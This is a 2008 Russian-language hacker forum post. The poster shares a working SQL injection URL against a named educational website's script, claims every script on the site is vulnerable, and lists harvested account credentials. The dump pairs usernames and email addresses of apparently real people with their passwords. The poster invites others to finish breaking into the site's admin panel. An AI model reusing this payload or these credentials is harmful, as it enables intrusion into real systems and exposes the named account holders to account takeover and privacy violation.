27.01.2008, 23:14
|
|
Новичок
Регистрация: 20.01.2007
Сообщений: 25
Провел на форуме:
102126
Репутация:
8
|
|
вот веселенький едушный сайт. до админки не догрыз, зато получил пасики от министерских мыльниц. если кто-нить финиширует, то дайте мне знать.
http://qt.exploratorium.edu/cils/resourcelist.php?categoryID=-1+union+select+concat_ws(char(58),username,passwor d)+from+account+limit%200,1
вот через эту штуку можно получить реквизиты. наковырял примерно это:
Код:
admin2:4dooney!2
richauslander:richauslander:dbeck@exploratorium.edu
erniekunze@earthlink.net:vivian (Ernie Kunze)
thomasc@exploratorium.edu:11111
fperson@physics.ucsc.edu:11111
уязвимы все скрипты поголовно. даже регистрация. блин. гдеж там одминка-то)) |
|
|